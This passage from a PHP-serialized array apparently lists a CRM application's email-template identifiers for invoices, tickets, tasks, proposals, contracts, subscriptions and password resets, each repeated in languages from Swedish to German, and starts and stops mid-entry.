ish\";i:1;s:26:\"invoice-due-notice-swedish\";i:1;s:43:\"estimate-request-submitted-to-staff-swedish\";i:1;s:33:\"estimate-request-assigned-swedish\";i:1;s:41:\"estimate-request-received-to-user-swedish\";i:1;s:29:\"new-client-created-portuguese\";i:1;s:33:\"invoice-send-to-client-portuguese\";i:1;s:34:\"new-ticket-opened-admin-portuguese\";i:1;s:23:\"ticket-reply-portuguese\";i:1;s:30:\"ticket-autoresponse-portuguese\";i:1;s:35:\"invoice-payment-recorded-portuguese\";i:1;s:33:\"invoice-overdue-notice-portuguese\";i:1;s:31:\"invoice-already-send-portuguese\";i:1;s:35:\"new-ticket-created-staff-portuguese\";i:1;s:34:\"estimate-send-to-client-portuguese\";i:1;s:32:\"ticket-reply-to-admin-portuguese\";i:1;s:32:\"estimate-already-send-portuguese\";i:1;s:30:\"contract-expiration-portuguese\";i:1;s:24:\"task-assigned-portuguese\";i:1;s:33:\"task-added-as-follower-portuguese\";i:1;s:25:\"task-commented-portuguese\";i:1;s:32:\"task-added-attachment-portuguese\";i:1;s:37:\"estimate-declined-to-staff-portuguese\";i:1;s:37:\"estimate-accepted-to-staff-portuguese\";i:1;s:35:\"proposal-client-accepted-portuguese\";i:1;s:36:\"proposal-send-to-customer-portuguese\";i:1;s:35:\"proposal-client-declined-portuguese\";i:1;s:36:\"proposal-client-thank-you-portuguese\";i:1;s:37:\"proposal-comment-to-client-portuguese\";i:1;s:36:\"proposal-comment-to-admin-portuguese\";i:1;s:41:\"estimate-thank-you-to-customer-portuguese\";i:1;s:37:\"task-deadline-notification-portuguese\";i:1;s:24:\"send-contract-portuguese\";i:1;s:44:\"invoice-payment-recorded-to-staff-portuguese\";i:1;s:28:\"auto-close-ticket-portuguese\";i:1;s:50:\"new-project-discussion-created-to-staff-portuguese\";i:1;s:53:\"new-project-discussion-created-to-customer-portuguese\";i:1;s:48:\"new-project-file-uploaded-to-customer-portuguese\";i:1;s:45:\"new-project-file-uploaded-to-staff-portuguese\";i:1;s:53:\"new-project-discussion-comment-to-customer-portuguese\";i:1;s:50:\"new-project-discussion-comment-to-staff-portuguese\";i:1;s:40:\"staff-added-as-project-member-portuguese\";i:1;s:35:\"estimate-expiry-reminder-portuguese\";i:1;s:35:\"proposal-expiry-reminder-portuguese\";i:1;s:28:\"new-staff-created-portuguese\";i:1;s:34:\"contact-forgot-password-portuguese\";i:1;s:35:\"contact-password-reseted-portuguese\";i:1;s:31:\"contact-set-password-portuguese\";i:1;s:32:\"staff-forgot-password-portuguese\";i:1;s:33:\"staff-password-reseted-portuguese\";i:1;s:30:\"assigned-to-project-portuguese\";i:1;s:44:\"task-added-attachment-to-contacts-portuguese\";i:1;s:37:\"task-commented-to-contacts-portuguese\";i:1;s:28:\"new-lead-assigned-portuguese\";i:1;s:27:\"client-statement-portuguese\";i:1;s:35:\"ticket-assigned-to-admin-portuguese\";i:1;s:41:\"new-client-registered-to-admin-portuguese\";i:1;s:41:\"new-web-to-lead-form-submitted-portuguese\";i:1;s:36:\"two-factor-authentication-portuguese\";i:1;s:39:\"project-finished-to-customer-portuguese\";i:1;s:37:\"credit-note-send-to-client-portuguese\";i:1;s:38:\"task-status-change-to-staff-portuguese\";i:1;s:41:\"task-status-change-to-contacts-portuguese\";i:1;s:31:\"reminder-email-staff-portuguese\";i:1;s:37:\"contract-comment-to-client-portuguese\";i:1;s:36:\"contract-comment-to-admin-portuguese\";i:1;s:28:\"send-subscription-portuguese\";i:1;s:38:\"subscription-payment-failed-portuguese\";i:1;s:32:\"subscription-canceled-portuguese\";i:1;s:41:\"subscription-payment-succeeded-portuguese\";i:1;s:39:\"contract-expiration-to-staff-portuguese\";i:1;s:31:\"gdpr-removal-request-portuguese\";i:1;s:36:\"gdpr-removal-request-lead-portuguese\";i:1;s:40:\"client-registration-confirmed-portuguese\";i:1;s:35:\"contract-signed-to-staff-portuguese\";i:1;s:39:\"customer-subscribed-to-staff-portuguese\";i:1;s:37:\"contact-verification-email-portuguese\";i:1;s:54:\"new-customer-profile-file-uploaded-to-staff-portuguese\";i:1;s:38:\"event-notification-to-staff-portuguese\";i:1;s:47:\"subscription-payment-requires-action-portuguese\";i:1;s:29:\"invoice-due-notice-portuguese\";i:1;s:46:\"estimate-request-submitted-to-staff-portuguese\";i:1;s:36:\"estimate-request-assigned-portuguese\";i:1;s:44:\"estimate-request-received-to-user-portuguese\";i:1;s:26:\"new-client-created-turkish\";i:1;s:30:\"invoice-send-to-client-turkish\";i:1;s:31:\"new-ticket-opened-admin-turkish\";i:1;s:20:\"ticket-reply-turkish\";i:1;s:27:\"ticket-autoresponse-turkish\";i:1;s:32:\"invoice-payment-recorded-turkish\";i:1;s:30:\"invoice-overdue-notice-turkish\";i:1;s:28:\"invoice-already-send-turkish\";i:1;s:32:\"new-ticket-created-staff-turkish\";i:1;s:31:\"estimate-send-to-client-turkish\";i:1;s:29:\"ticket-reply-to-admin-turkish\";i:1;s:29:\"estimate-already-send-turkish\";i:1;s:27:\"contract-expiration-turkish\";i:1;s:21:\"task-assigned-turkish\";i:1;s:30:\"task-added-as-follower-turkish\";i:1;s:22:\"task-commented-turkish\";i:1;s:29:\"task-added-attachment-turkish\";i:1;s:34:\"estimate-declined-to-staff-turkish\";i:1;s:34:\"estimate-accepted-to-staff-turkish\";i:1;s:32:\"proposal-client-accepted-turkish\";i:1;s:33:\"proposal-send-to-customer-turkish\";i:1;s:32:\"proposal-client-declined-turkish\";i:1;s:33:\"proposal-client-thank-you-turkish\";i:1;s:34:\"proposal-comment-to-client-turkish\";i:1;s:33:\"proposal-comment-to-admin-turkish\";i:1;s:38:\"estimate-thank-you-to-customer-turkish\";i:1;s:34:\"task-deadline-notification-turkish\";i:1;s:21:\"send-contract-turkish\";i:1;s:41:\"invoice-payment-recorded-to-staff-turkish\";i:1;s:25:\"auto-close-ticket-turkish\";i:1;s:47:\"new-project-discussion-created-to-staff-turkish\";i:1;s:50:\"new-project-discussion-created-to-customer-turkish\";i:1;s:45:\"new-project-file-uploaded-to-customer-turkish\";i:1;s:42:\"new-project-file-uploaded-to-staff-turkish\";i:1;s:50:\"new-project-discussion-comment-to-customer-turkish\";i:1;s:47:\"new-project-discussion-comment-to-staff-turkish\";i:1;s:37:\"staff-added-as-project-member-turkish\";i:1;s:32:\"estimate-expiry-reminder-turkish\";i:1;s:32:\"proposal-expiry-reminder-turkish\";i:1;s:25:\"new-staff-created-turkish\";i:1;s:31:\"contact-forgot-password-turkish\";i:1;s:32:\"contact-password-reseted-turkish\";i:1;s:28:\"contact-set-password-turkish\";i:1;s:29:\"staff-forgot-password-turkish\";i:1;s:30:\"staff-password-reseted-turkish\";i:1;s:27:\"assigned-to-project-turkish\";i:1;s:41:\"task-added-attachment-to-contacts-turkish\";i:1;s:34:\"task-commented-to-contacts-turkish\";i:1;s:25:\"new-lead-assigned-turkish\";i:1;s:24:\"client-statement-turkish\";i:1;s:32:\"ticket-assigned-to-admin-turkish\";i:1;s:38:\"new-client-registered-to-admin-turkish\";i:1;s:38:\"new-web-to-lead-form-submitted-turkish\";i:1;s:33:\"two-factor-authentication-turkish\";i:1;s:36:\"project-finished-to-customer-turkish\";i:1;s:34:\"credit-note-send-to-client-turkish\";i:1;s:35:\"task-status-change-to-staff-turkish\";i:1;s:38:\"task-status-change-to-contacts-turkish\";i:1;s:28:\"reminder-email-staff-turkish\";i:1;s:34:\"contract-comment-to-client-turkish\";i:1;s:33:\"contract-comment-to-admin-turkish\";i:1;s:25:\"send-subscription-turkish\";i:1;s:35:\"subscription-payment-failed-turkish\";i:1;s:29:\"subscription-canceled-turkish\";i:1;s:38:\"subscription-payment-succeeded-turkish\";i:1;s:36:\"contract-expiration-to-staff-turkish\";i:1;s:28:\"gdpr-removal-request-turkish\";i:1;s:33:\"gdpr-removal-request-lead-turkish\";i:1;s:37:\"client-registration-confirmed-turkish\";i:1;s:32:\"contract-signed-to-staff-turkish\";i:1;s:36:\"customer-subscribed-to-staff-turkish\";i:1;s:34:\"contact-verification-email-turkish\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-turkish\";i:1;s:35:\"event-notification-to-staff-turkish\";i:1;s:44:\"subscription-payment-requires-action-turkish\";i:1;s:26:\"invoice-due-notice-turkish\";i:1;s:43:\"estimate-request-submitted-to-staff-turkish\";i:1;s:33:\"estimate-request-assigned-turkish\";i:1;s:41:\"estimate-request-received-to-user-turkish\";i:1;s:28:\"new-client-created-bulgarian\";i:1;s:32:\"invoice-send-to-client-bulgarian\";i:1;s:33:\"new-ticket-opened-admin-bulgarian\";i:1;s:22:\"ticket-reply-bulgarian\";i:1;s:29:\"ticket-autoresponse-bulgarian\";i:1;s:34:\"invoice-payment-recorded-bulgarian\";i:1;s:32:\"invoice-overdue-notice-bulgarian\";i:1;s:30:\"invoice-already-send-bulgarian\";i:1;s:34:\"new-ticket-created-staff-bulgarian\";i:1;s:33:\"estimate-send-to-client-bulgarian\";i:1;s:31:\"ticket-reply-to-admin-bulgarian\";i:1;s:31:\"estimate-already-send-bulgarian\";i:1;s:29:\"contract-expiration-bulgarian\";i:1;s:23:\"task-assigned-bulgarian\";i:1;s:32:\"task-added-as-follower-bulgarian\";i:1;s:24:\"task-commented-bulgarian\";i:1;s:31:\"task-added-attachment-bulgarian\";i:1;s:36:\"estimate-declined-to-staff-bulgarian\";i:1;s:36:\"estimate-accepted-to-staff-bulgarian\";i:1;s:34:\"proposal-client-accepted-bulgarian\";i:1;s:35:\"proposal-send-to-customer-bulgarian\";i:1;s:34:\"proposal-client-declined-bulgarian\";i:1;s:35:\"proposal-client-thank-you-bulgarian\";i:1;s:36:\"proposal-comment-to-client-bulgarian\";i:1;s:35:\"proposal-comment-to-admin-bulgarian\";i:1;s:40:\"estimate-thank-you-to-customer-bulgarian\";i:1;s:36:\"task-deadline-notification-bulgarian\";i:1;s:23:\"send-contract-bulgarian\";i:1;s:43:\"invoice-payment-recorded-to-staff-bulgarian\";i:1;s:27:\"auto-close-ticket-bulgarian\";i:1;s:49:\"new-project-discussion-created-to-staff-bulgarian\";i:1;s:52:\"new-project-discussion-created-to-customer-bulgarian\";i:1;s:47:\"new-project-file-uploaded-to-customer-bulgarian\";i:1;s:44:\"new-project-file-uploaded-to-staff-bulgarian\";i:1;s:52:\"new-project-discussion-comment-to-customer-bulgarian\";i:1;s:49:\"new-project-discussion-comment-to-staff-bulgarian\";i:1;s:39:\"staff-added-as-project-member-bulgarian\";i:1;s:34:\"estimate-expiry-reminder-bulgarian\";i:1;s:34:\"proposal-expiry-reminder-bulgarian\";i:1;s:27:\"new-staff-created-bulgarian\";i:1;s:33:\"contact-forgot-password-bulgarian\";i:1;s:34:\"contact-password-reseted-bulgarian\";i:1;s:30:\"contact-set-password-bulgarian\";i:1;s:31:\"staff-forgot-password-bulgarian\";i:1;s:32:\"staff-password-reseted-bulgarian\";i:1;s:29:\"assigned-to-project-bulgarian\";i:1;s:43:\"task-added-attachment-to-contacts-bulgarian\";i:1;s:36:\"task-commented-to-contacts-bulgarian\";i:1;s:27:\"new-lead-assigned-bulgarian\";i:1;s:26:\"client-statement-bulgarian\";i:1;s:34:\"ticket-assigned-to-admin-bulgarian\";i:1;s:40:\"new-client-registered-to-admin-bulgarian\";i:1;s:40:\"new-web-to-lead-form-submitted-bulgarian\";i:1;s:35:\"two-factor-authentication-bulgarian\";i:1;s:38:\"project-finished-to-customer-bulgarian\";i:1;s:36:\"credit-note-send-to-client-bulgarian\";i:1;s:37:\"task-status-change-to-staff-bulgarian\";i:1;s:40:\"task-status-change-to-contacts-bulgarian\";i:1;s:30:\"reminder-email-staff-bulgarian\";i:1;s:36:\"contract-comment-to-client-bulgarian\";i:1;s:35:\"contract-comment-to-admin-bulgarian\";i:1;s:27:\"send-subscription-bulgarian\";i:1;s:37:\"subscription-payment-failed-bulgarian\";i:1;s:31:\"subscription-canceled-bulgarian\";i:1;s:40:\"subscription-payment-succeeded-bulgarian\";i:1;s:38:\"contract-expiration-to-staff-bulgarian\";i:1;s:30:\"gdpr-removal-request-bulgarian\";i:1;s:35:\"gdpr-removal-request-lead-bulgarian\";i:1;s:39:\"client-registration-confirmed-bulgarian\";i:1;s:34:\"contract-signed-to-staff-bulgarian\";i:1;s:38:\"customer-subscribed-to-staff-bulgarian\";i:1;s:36:\"contact-verification-email-bulgarian\";i:1;s:53:\"new-customer-profile-file-uploaded-to-staff-bulgarian\";i:1;s:37:\"event-notification-to-staff-bulgarian\";i:1;s:46:\"subscription-payment-requires-action-bulgarian\";i:1;s:28:\"invoice-due-notice-bulgarian\";i:1;s:45:\"estimate-request-submitted-to-staff-bulgarian\";i:1;s:35:\"estimate-request-assigned-bulgarian\";i:1;s:43:\"estimate-request-received-to-user-bulgarian\";i:1;s:24:\"new-client-created-dutch\";i:1;s:28:\"invoice-send-to-client-dutch\";i:1;s:29:\"new-ticket-opened-admin-dutch\";i:1;s:18:\"ticket-reply-dutch\";i:1;s:25:\"ticket-autoresponse-dutch\";i:1;s:30:\"invoice-payment-recorded-dutch\";i:1;s:28:\"invoice-overdue-notice-dutch\";i:1;s:26:\"invoice-already-send-dutch\";i:1;s:30:\"new-ticket-created-staff-dutch\";i:1;s:29:\"estimate-send-to-client-dutch\";i:1;s:27:\"ticket-reply-to-admin-dutch\";i:1;s:27:\"estimate-already-send-dutch\";i:1;s:25:\"contract-expiration-dutch\";i:1;s:19:\"task-assigned-dutch\";i:1;s:28:\"task-added-as-follower-dutch\";i:1;s:20:\"task-commented-dutch\";i:1;s:27:\"task-added-attachment-dutch\";i:1;s:32:\"estimate-declined-to-staff-dutch\";i:1;s:32:\"estimate-accepted-to-staff-dutch\";i:1;s:30:\"proposal-client-accepted-dutch\";i:1;s:31:\"proposal-send-to-customer-dutch\";i:1;s:30:\"proposal-client-declined-dutch\";i:1;s:31:\"proposal-client-thank-you-dutch\";i:1;s:32:\"proposal-comment-to-client-dutch\";i:1;s:31:\"proposal-comment-to-admin-dutch\";i:1;s:36:\"estimate-thank-you-to-customer-dutch\";i:1;s:32:\"task-deadline-notification-dutch\";i:1;s:19:\"send-contract-dutch\";i:1;s:39:\"invoice-payment-recorded-to-staff-dutch\";i:1;s:23:\"auto-close-ticket-dutch\";i:1;s:45:\"new-project-discussion-created-to-staff-dutch\";i:1;s:48:\"new-project-discussion-created-to-customer-dutch\";i:1;s:43:\"new-project-file-uploaded-to-customer-dutch\";i:1;s:40:\"new-project-file-uploaded-to-staff-dutch\";i:1;s:48:\"new-project-discussion-comment-to-customer-dutch\";i:1;s:45:\"new-project-discussion-comment-to-staff-dutch\";i:1;s:35:\"staff-added-as-project-member-dutch\";i:1;s:30:\"estimate-expiry-reminder-dutch\";i:1;s:30:\"proposal-expiry-reminder-dutch\";i:1;s:23:\"new-staff-created-dutch\";i:1;s:29:\"contact-forgot-password-dutch\";i:1;s:30:\"contact-password-reseted-dutch\";i:1;s:26:\"contact-set-password-dutch\";i:1;s:27:\"staff-forgot-password-dutch\";i:1;s:28:\"staff-password-reseted-dutch\";i:1;s:25:\"assigned-to-project-dutch\";i:1;s:39:\"task-added-attachment-to-contacts-dutch\";i:1;s:32:\"task-commented-to-contacts-dutch\";i:1;s:23:\"new-lead-assigned-dutch\";i:1;s:22:\"client-statement-dutch\";i:1;s:30:\"ticket-assigned-to-admin-dutch\";i:1;s:36:\"new-client-registered-to-admin-dutch\";i:1;s:36:\"new-web-to-lead-form-submitted-dutch\";i:1;s:31:\"two-factor-authentication-dutch\";i:1;s:34:\"project-finished-to-customer-dutch\";i:1;s:32:\"credit-note-send-to-client-dutch\";i:1;s:33:\"task-status-change-to-staff-dutch\";i:1;s:36:\"task-status-change-to-contacts-dutch\";i:1;s:26:\"reminder-email-staff-dutch\";i:1;s:32:\"contract-comment-to-client-dutch\";i:1;s:31:\"contract-comment-to-admin-dutch\";i:1;s:23:\"send-subscription-dutch\";i:1;s:33:\"subscription-payment-failed-dutch\";i:1;s:27:\"subscription-canceled-dutch\";i:1;s:36:\"subscription-payment-succeeded-dutch\";i:1;s:34:\"contract-expiration-to-staff-dutch\";i:1;s:26:\"gdpr-removal-request-dutch\";i:1;s:31:\"gdpr-removal-request-lead-dutch\";i:1;s:35:\"client-registration-confirmed-dutch\";i:1;s:30:\"contract-signed-to-staff-dutch\";i:1;s:34:\"customer-subscribed-to-staff-dutch\";i:1;s:32:\"contact-verification-email-dutch\";i:1;s:49:\"new-customer-profile-file-uploaded-to-staff-dutch\";i:1;s:33:\"event-notification-to-staff-dutch\";i:1;s:42:\"subscription-payment-requires-action-dutch\";i:1;s:24:\"invoice-due-notice-dutch\";i:1;s:41:\"estimate-request-submitted-to-staff-dutch\";i:1;s:31:\"estimate-request-assigned-dutch\";i:1;s:39:\"estimate-request-received-to-user-dutch\";i:1;s:26:\"new-client-created-russian\";i:1;s:30:\"invoice-send-to-client-russian\";i:1;s:31:\"new-ticket-opened-admin-russian\";i:1;s:20:\"ticket-reply-russian\";i:1;s:27:\"ticket-autoresponse-russian\";i:1;s:32:\"invoice-payment-recorded-russian\";i:1;s:30:\"invoice-overdue-notice-russian\";i:1;s:28:\"invoice-already-send-russian\";i:1;s:32:\"new-ticket-created-staff-russian\";i:1;s:31:\"estimate-send-to-client-russian\";i:1;s:29:\"ticket-reply-to-admin-russian\";i:1;s:29:\"estimate-already-send-russian\";i:1;s:27:\"contract-expiration-russian\";i:1;s:21:\"task-assigned-russian\";i:1;s:30:\"task-added-as-follower-russian\";i:1;s:22:\"task-commented-russian\";i:1;s:29:\"task-added-attachment-russian\";i:1;s:34:\"estimate-declined-to-staff-russian\";i:1;s:34:\"estimate-accepted-to-staff-russian\";i:1;s:32:\"proposal-client-accepted-russian\";i:1;s:33:\"proposal-send-to-customer-russian\";i:1;s:32:\"proposal-client-declined-russian\";i:1;s:33:\"proposal-client-thank-you-russian\";i:1;s:34:\"proposal-comment-to-client-russian\";i:1;s:33:\"proposal-comment-to-admin-russian\";i:1;s:38:\"estimate-thank-you-to-customer-russian\";i:1;s:34:\"task-deadline-notification-russian\";i:1;s:21:\"send-contract-russian\";i:1;s:41:\"invoice-payment-recorded-to-staff-russian\";i:1;s:25:\"auto-close-ticket-russian\";i:1;s:47:\"new-project-discussion-created-to-staff-russian\";i:1;s:50:\"new-project-discussion-created-to-customer-russian\";i:1;s:45:\"new-project-file-uploaded-to-customer-russian\";i:1;s:42:\"new-project-file-uploaded-to-staff-russian\";i:1;s:50:\"new-project-discussion-comment-to-customer-russian\";i:1;s:47:\"new-project-discussion-comment-to-staff-russian\";i:1;s:37:\"staff-added-as-project-member-russian\";i:1;s:32:\"estimate-expiry-reminder-russian\";i:1;s:32:\"proposal-expiry-reminder-russian\";i:1;s:25:\"new-staff-created-russian\";i:1;s:31:\"contact-forgot-password-russian\";i:1;s:32:\"contact-password-reseted-russian\";i:1;s:28:\"contact-set-password-russian\";i:1;s:29:\"staff-forgot-password-russian\";i:1;s:30:\"staff-password-reseted-russian\";i:1;s:27:\"assigned-to-project-russian\";i:1;s:41:\"task-added-attachment-to-contacts-russian\";i:1;s:34:\"task-commented-to-contacts-russian\";i:1;s:25:\"new-lead-assigned-russian\";i:1;s:24:\"client-statement-russian\";i:1;s:32:\"ticket-assigned-to-admin-russian\";i:1;s:38:\"new-client-registered-to-admin-russian\";i:1;s:38:\"new-web-to-lead-form-submitted-russian\";i:1;s:33:\"two-factor-authentication-russian\";i:1;s:36:\"project-finished-to-customer-russian\";i:1;s:34:\"credit-note-send-to-client-russian\";i:1;s:35:\"task-status-change-to-staff-russian\";i:1;s:38:\"task-status-change-to-contacts-russian\";i:1;s:28:\"reminder-email-staff-russian\";i:1;s:34:\"contract-comment-to-client-russian\";i:1;s:33:\"contract-comment-to-admin-russian\";i:1;s:25:\"send-subscription-russian\";i:1;s:35:\"subscription-payment-failed-russian\";i:1;s:29:\"subscription-canceled-russian\";i:1;s:38:\"subscription-payment-succeeded-russian\";i:1;s:36:\"contract-expiration-to-staff-russian\";i:1;s:28:\"gdpr-removal-request-russian\";i:1;s:33:\"gdpr-removal-request-lead-russian\";i:1;s:37:\"client-registration-confirmed-russian\";i:1;s:32:\"contract-signed-to-staff-russian\";i:1;s:36:\"customer-subscribed-to-staff-russian\";i:1;s:34:\"contact-verification-email-russian\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-russian\";i:1;s:35:\"event-notification-to-staff-russian\";i:1;s:44:\"subscription-payment-requires-action-russian\";i:1;s:26:\"invoice-due-notice-russian\";i:1;s:43:\"estimate-request-submitted-to-staff-russian\";i:1;s:33:\"estimate-request-assigned-russian\";i:1;s:41:\"estimate-request-received-to-user-russian\";i:1;s:24:\"new-client-created-greek\";i:1;s:28:\"invoice-send-to-client-greek\";i:1;s:29:\"new-ticket-opened-admin-greek\";i:1;s:18:\"ticket-reply-greek\";i:1;s:25:\"ticket-autoresponse-greek\";i:1;s:30:\"invoice-payment-recorded-greek\";i:1;s:28:\"invoice-overdue-notice-greek\";i:1;s:26:\"invoice-already-send-greek\";i:1;s:30:\"new-ticket-created-staff-greek\";i:1;s:29:\"estimate-send-to-client-greek\";i:1;s:27:\"ticket-reply-to-admin-greek\";i:1;s:27:\"estimate-already-send-greek\";i:1;s:25:\"contract-expiration-greek\";i:1;s:19:\"task-assigned-greek\";i:1;s:28:\"task-added-as-follower-greek\";i:1;s:20:\"task-commented-greek\";i:1;s:27:\"task-added-attachment-greek\";i:1;s:32:\"estimate-declined-to-staff-greek\";i:1;s:32:\"estimate-accepted-to-staff-greek\";i:1;s:30:\"proposal-client-accepted-greek\";i:1;s:31:\"proposal-send-to-customer-greek\";i:1;s:30:\"proposal-client-declined-greek\";i:1;s:31:\"proposal-client-thank-you-greek\";i:1;s:32:\"proposal-comment-to-client-greek\";i:1;s:31:\"proposal-comment-to-admin-greek\";i:1;s:36:\"estimate-thank-you-to-customer-greek\";i:1;s:32:\"task-deadline-notification-greek\";i:1;s:19:\"send-contract-greek\";i:1;s:39:\"invoice-payment-recorded-to-staff-greek\";i:1;s:23:\"auto-close-ticket-greek\";i:1;s:45:\"new-project-discussion-created-to-staff-greek\";i:1;s:48:\"new-project-discussion-created-to-customer-greek\";i:1;s:43:\"new-project-file-uploaded-to-customer-greek\";i:1;s:40:\"new-project-file-uploaded-to-staff-greek\";i:1;s:48:\"new-project-discussion-comment-to-customer-greek\";i:1;s:45:\"new-project-discussion-comment-to-staff-greek\";i:1;s:35:\"staff-added-as-project-member-greek\";i:1;s:30:\"estimate-expiry-reminder-greek\";i:1;s:30:\"proposal-expiry-reminder-greek\";i:1;s:23:\"new-staff-created-greek\";i:1;s:29:\"contact-forgot-password-greek\";i:1;s:30:\"contact-password-reseted-greek\";i:1;s:26:\"contact-set-password-greek\";i:1;s:27:\"staff-forgot-password-greek\";i:1;s:28:\"staff-password-reseted-greek\";i:1;s:25:\"assigned-to-project-greek\";i:1;s:39:\"task-added-attachment-to-contacts-greek\";i:1;s:32:\"task-commented-to-contacts-greek\";i:1;s:23:\"new-lead-assigned-greek\";i:1;s:22:\"client-statement-greek\";i:1;s:30:\"ticket-assigned-to-admin-greek\";i:1;s:36:\"new-client-registered-to-admin-greek\";i:1;s:36:\"new-web-to-lead-form-submitted-greek\";i:1;s:31:\"two-factor-authentication-greek\";i:1;s:34:\"project-finished-to-customer-greek\";i:1;s:32:\"credit-note-send-to-client-greek\";i:1;s:33:\"task-status-change-to-staff-greek\";i:1;s:36:\"task-status-change-to-contacts-greek\";i:1;s:26:\"reminder-email-staff-greek\";i:1;s:32:\"contract-comment-to-client-greek\";i:1;s:31:\"contract-comment-to-admin-greek\";i:1;s:23:\"send-subscription-greek\";i:1;s:33:\"subscription-payment-failed-greek\";i:1;s:27:\"subscription-canceled-greek\";i:1;s:36:\"subscription-payment-succeeded-greek\";i:1;s:34:\"contract-expiration-to-staff-greek\";i:1;s:26:\"gdpr-removal-request-greek\";i:1;s:31:\"gdpr-removal-request-lead-greek\";i:1;s:35:\"client-registration-confirmed-greek\";i:1;s:30:\"contract-signed-to-staff-greek\";i:1;s:34:\"customer-subscribed-to-staff-greek\";i:1;s:32:\"contact-verification-email-greek\";i:1;s:49:\"new-customer-profile-file-uploaded-to-staff-greek\";i:1;s:33:\"event-notification-to-staff-greek\";i:1;s:42:\"subscription-payment-requires-action-greek\";i:1;s:24:\"invoice-due-notice-greek\";i:1;s:41:\"estimate-request-submitted-to-staff-greek\";i:1;s:31:\"estimate-request-assigned-greek\";i:1;s:39:\"estimate-request-received-to-user-greek\";i:1;s:26:\"new-client-created-catalan\";i:1;s:30:\"invoice-send-to-client-catalan\";i:1;s:31:\"new-ticket-opened-admin-catalan\";i:1;s:20:\"ticket-reply-catalan\";i:1;s:27:\"ticket-autoresponse-catalan\";i:1;s:32:\"invoice-payment-recorded-catalan\";i:1;s:30:\"invoice-overdue-notice-catalan\";i:1;s:28:\"invoice-already-send-catalan\";i:1;s:32:\"new-ticket-created-staff-catalan\";i:1;s:31:\"estimate-send-to-client-catalan\";i:1;s:29:\"ticket-reply-to-admin-catalan\";i:1;s:29:\"estimate-already-send-catalan\";i:1;s:27:\"contract-expiration-catalan\";i:1;s:21:\"task-assigned-catalan\";i:1;s:30:\"task-added-as-follower-catalan\";i:1;s:22:\"task-commented-catalan\";i:1;s:29:\"task-added-attachment-catalan\";i:1;s:34:\"estimate-declined-to-staff-catalan\";i:1;s:34:\"estimate-accepted-to-staff-catalan\";i:1;s:32:\"proposal-client-accepted-catalan\";i:1;s:33:\"proposal-send-to-customer-catalan\";i:1;s:32:\"proposal-client-declined-catalan\";i:1;s:33:\"proposal-client-thank-you-catalan\";i:1;s:34:\"proposal-comment-to-client-catalan\";i:1;s:33:\"proposal-comment-to-admin-catalan\";i:1;s:38:\"estimate-thank-you-to-customer-catalan\";i:1;s:34:\"task-deadline-notification-catalan\";i:1;s:21:\"send-contract-catalan\";i:1;s:41:\"invoice-payment-recorded-to-staff-catalan\";i:1;s:25:\"auto-close-ticket-catalan\";i:1;s:47:\"new-project-discussion-created-to-staff-catalan\";i:1;s:50:\"new-project-discussion-created-to-customer-catalan\";i:1;s:45:\"new-project-file-uploaded-to-customer-catalan\";i:1;s:42:\"new-project-file-uploaded-to-staff-catalan\";i:1;s:50:\"new-project-discussion-comment-to-customer-catalan\";i:1;s:47:\"new-project-discussion-comment-to-staff-catalan\";i:1;s:37:\"staff-added-as-project-member-catalan\";i:1;s:32:\"estimate-expiry-reminder-catalan\";i:1;s:32:\"proposal-expiry-reminder-catalan\";i:1;s:25:\"new-staff-created-catalan\";i:1;s:31:\"contact-forgot-password-catalan\";i:1;s:32:\"contact-password-reseted-catalan\";i:1;s:28:\"contact-set-password-catalan\";i:1;s:29:\"staff-forgot-password-catalan\";i:1;s:30:\"staff-password-reseted-catalan\";i:1;s:27:\"assigned-to-project-catalan\";i:1;s:41:\"task-added-attachment-to-contacts-catalan\";i:1;s:34:\"task-commented-to-contacts-catalan\";i:1;s:25:\"new-lead-assigned-catalan\";i:1;s:24:\"client-statement-catalan\";i:1;s:32:\"ticket-assigned-to-admin-catalan\";i:1;s:38:\"new-client-registered-to-admin-catalan\";i:1;s:38:\"new-web-to-lead-form-submitted-catalan\";i:1;s:33:\"two-factor-authentication-catalan\";i:1;s:36:\"project-finished-to-customer-catalan\";i:1;s:34:\"credit-note-send-to-client-catalan\";i:1;s:35:\"task-status-change-to-staff-catalan\";i:1;s:38:\"task-status-change-to-contacts-catalan\";i:1;s:28:\"reminder-email-staff-catalan\";i:1;s:34:\"contract-comment-to-client-catalan\";i:1;s:33:\"contract-comment-to-admin-catalan\";i:1;s:25:\"send-subscription-catalan\";i:1;s:35:\"subscription-payment-failed-catalan\";i:1;s:29:\"subscription-canceled-catalan\";i:1;s:38:\"subscription-payment-succeeded-catalan\";i:1;s:36:\"contract-expiration-to-staff-catalan\";i:1;s:28:\"gdpr-removal-request-catalan\";i:1;s:33:\"gdpr-removal-request-lead-catalan\";i:1;s:37:\"client-registration-confirmed-catalan\";i:1;s:32:\"contract-signed-to-staff-catalan\";i:1;s:36:\"customer-subscribed-to-staff-catalan\";i:1;s:34:\"contact-verification-email-catalan\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-catalan\";i:1;s:35:\"event-notification-to-staff-catalan\";i:1;s:44:\"subscription-payment-requires-action-catalan\";i:1;s:26:\"invoice-due-notice-catalan\";i:1;s:43:\"estimate-request-submitted-to-staff-catalan\";i:1;s:33:\"estimate-request-assigned-catalan\";i:1;s:41:\"estimate-request-received-to-user-catalan\";i:1;s:25:\"new-client-created-german\";i:1;s:29:\"invoice-send-to-client-german\";i:1;s:30:\"new-ticket-opened-admin-german\";i:1;s:19:\"ticket-reply-german\";i:1;s:26:\"ticket-autoresponse-german\";i:1;s:31:\"invoice-payment-recorded-german\";i:1;s:29:\"invoice-overdue-notice-german\";i:1;s:27:\"invoice-already-send-german\";i:1;s:31:\"new-ticket-created-staff-german\";i:1;s:30:\"estimate-send-to-client-german\";i:1;s:28:\"ticket-reply-to-admin-german\";i:1;s:28:\"estimate-already-send-german\";i:1;s:26:\"contract-expiration-german\";i:1;s:20:\"task-assigned-german\";i:1;s:29:\"task-added-as-follower-german\";i:1;s:21:\"task-commented-german\";i:1;s:28:\"task-added-attachment-german\";i:1;s:33:\"estimate-declined-to-staff-german\";i:1;s:33:\"estimate-accepted-to-staff-german\";i:1;s:31:\"proposal-client-accepted-german\";i:1;s:32:\"proposal-send-to-customer-german\";i:1;s:31:\"proposal-client-declined-german\";i:1;s:32:\"proposal-client-thank-you-german\";i:1;s:33:\"proposal-comment-to-client-german\";i:1;s:32:\"proposal-comment-to-admin-german\";i:1;s:37:\"estimate-thank-you-to-customer-german\";i:1;s:33:\"task-deadline-notification-german\";i